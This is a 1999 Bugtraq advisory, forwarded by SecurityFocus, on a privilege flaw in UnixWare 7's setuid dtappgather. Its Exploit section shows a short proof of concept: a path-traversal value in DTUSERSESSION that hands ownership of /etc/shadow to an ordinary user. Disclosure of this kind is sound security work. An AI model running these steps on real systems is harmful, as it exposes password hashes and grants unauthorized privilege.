UnixWare 7's dtappgather

[aleph1 () SECURITYFOCUS COM (Elias Levy)]

Please note this is the same vulnerability as BUGTRAQ ID (BID) 131.
http://www.securityfocus.com/bid/131

What is new is the fact that UnixWare 7 is affected by this problem.

---------- Forwarded message ----------
Date: Wed, 3 Nov 1999 10:51:52 -0800 (PST)
From: Sangfroid <sang () blackops org>
Subject: bugtraq post

Introduction to w00giving '99

RFP's most excellent 0kt0berfest commitment to working for
everyman to make the world more secure, caused w00w00 to stop
and give thought to our collective contribution to the world
of computer security.  Finding ourselves lacking in the past few months,
our hearts were pricked and we were driven to repentance.

Being the month of thankfulness for all we have received this year,
w00w00 looked back and found many things to give back to the computer
security community.
============================================================
To celebrate the upcoming mass-destruction and world-wide chaos in 2000,
w00w00 Security Development (WSD) will be releasing many advisories
depending on vendor's timely responses.

The severity of each vulnerability will outweigh the previously posted
one, so keep your eyes out!

If all goes according to plan, w00giving '99 will close with its largest
vulnerability on Jan. 1, 2000, aka w00mageddon.

Note: eEye Digital Security is also participating with us to independently
release NT tools and vulnerabilities within the next few weeks.

w00w00, eEye, rfp, technotronic, wiretrip

======================================================
w00giving '99

 Let the games begin...
======================================================

 Vendors should review available best practice guidelines on
 secure programming techniques. Should they have done so in this
 instance, they would have instantly recognized the security issue we
 discovered.
 We also understand it's much easier to audit code post-release,
 and realize the underpaid coders are pushed to market by
 marketing monkeys and management that do not represent
 secure programming techniques.

MANAGER NOTE:
======================================================
THIS IS IMPORTANT, SORRY ABOUT THE LACK OF
POWER POINT PRESENTATION!

"GIVE YOUR CODERS MORE MONEY AND TIME!"
======================================================
END OF MANAGER NOTE, GO BACK TO YOUR MEETING.

 Note:
 All you really have to do to find bugs like this is use some
 application like strace, ktrace, or truss(depending on your
 operating environmen)  and look for suspect calls.

 For instance, if you see a call to getenv() and then the
 value of the environment variable mysteriously showing up in an
 open() call, there is probably something wrong here.

 Pay strict attention, you will see this material again.

======================================================

UnixWare 7's dtappgather
Discovered by: K2 (ktwo () ktwo ca)

UnixWare 7's dtappgather runs with superuser privileges, but improperly
check $DTUSERSESSION to ensure that the file is readable/writeable or
owned by the user running it.

---------------------------------------------------------------------------
Exploit:

rain:/usr/dt/bin$ export DTUSERSESSION=../../../../etc/shadow
rain:/usr/dt/bin$ ./dtappgather
MakeDirectory: /var/dt/appconfig/appmanager/../../../../etc/shadow: File
exists
rain:/usr/dt/bin$ ls -la /etc/shadow
-r-xr-xr-x   1 ktwo     other         358 Oct 26 04:37 /etc/shadow*

---------------------------------------------------------------------------
Patch:

Because SCO doesn't release source for UnixWare, we must wait for them to
provide one.

---------------------------------------------------------------------------

Contributors to w00giving '99: awr, jobe, Sangfroid, rfp, vacuum, and
interrupt
People who deserve hellos: nocarrier, minus, daveg, nny, marc,
and w00god blake

w00w00 Security Development (WSD)
[See http://www.datasurge.net/www.w00w00.org, the official mirror, until
relocation of w00w00.org is complete]

----- End forwarded message -----

--
Elias Levy
Security Focus
http://www.securityfocus.com/